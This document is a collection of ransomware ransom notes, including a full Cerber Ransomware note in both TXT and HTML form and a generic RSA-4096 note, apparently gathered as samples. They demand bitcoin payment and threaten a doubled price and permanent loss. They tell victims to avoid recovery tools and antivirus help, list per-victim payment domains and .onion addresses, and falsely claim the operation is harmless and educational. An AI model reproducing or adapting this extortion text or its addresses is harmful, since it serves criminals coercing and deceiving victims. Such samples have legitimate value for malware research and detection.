http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/2C51B9E8D8684675 2. http://tes543berda73i48fsdfsd.keratadze.at/2C51B9E8D8684675 3. http://tt54rfdjhb34rfbnknaerg.milerteddy.com/2C51B9E8D8684675 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/2C51B9E8D8684675 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/2C51B9E8D8684675 http://tes543berda73i48fsdfsd.keratadze.at/2C51B9E8D8684675 http://tt54rfdjhb34rfbnknaerg.milerteddy.com/2C51B9E8D8684675 *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/2C51B9E8D8684675

__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://akdfrefdkm45tf33fsdfsdf.yamenswash.com/2C51B9E8D8684675 2. http://p4fhmjnsdfbm4w4fdsc.avowvoice.com/2C51B9E8D8684675 3. http://nn54djhfnrnm4dnjnerfsd.replylaten.at/2C51B9E8D8684675 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/2C51B9E8D8684675 4. Follow the instructions on the site. !!! IMPORTANT INFORMATION: !!! Your personal pages: http://akdfrefdkm45tf33fsdfsdf.yamenswash.com/2C51B9E8D8684675 http://p4fhmjnsdfbm4w4fdsc.avowvoice.com/2C51B9E8D8684675 http://nn54djhfnrnm4dnjnerfsd.replylaten.at/2C51B9E8D8684675 !!! Your personal page Tor-Browser: fwgrhsao3aoml7ej.onion/2C51B9E8D8684675 !!! Your personal identification ID: 2C51B9E8D8684675

C E R B E R R A N S O M W A R E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable? It is normal because the files' names, as well as the data in your files have been encrypted. Great!!! You have turned to be a part of a big community #CerberRansomware. ######################################################################### !!! If you are reading this message it means the software !!! "Cerber Ransomware" has been removed from your computer. ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to get back your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4 | | 2. http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4 | | 3. http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4 | | 4. http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4 | | 5. http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://cerberhhyed5frqa.onion/E99A-5580-A36F-0063-7AE4 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.

<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber Ransomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .tor { padding: 10px 0; text-align: center; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!!!<br>You have turned to be a part of a big community #CerberRansomware.</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber Ransomware" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">Any attempts to get back your files with the third-party tools can be fatal for your encrypted files.</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files.</p> <p>When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.azwsxe.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.adevf4.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.xtrvb4.win/E99A-5580-A36F-0063-7AE4</a></li> <li><a href="http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.werti4.win/E99A-5580-A36F-0063-7AE4</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <a href="http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4" target="_blank">http://cerberhhyed5frqa.asd3r3.win/E99A-5580-A36F-0063-7AE4</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://cerberhhyed5frqa.onion/E99A-5580-A36F-0063-7AE4</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> </body> </html>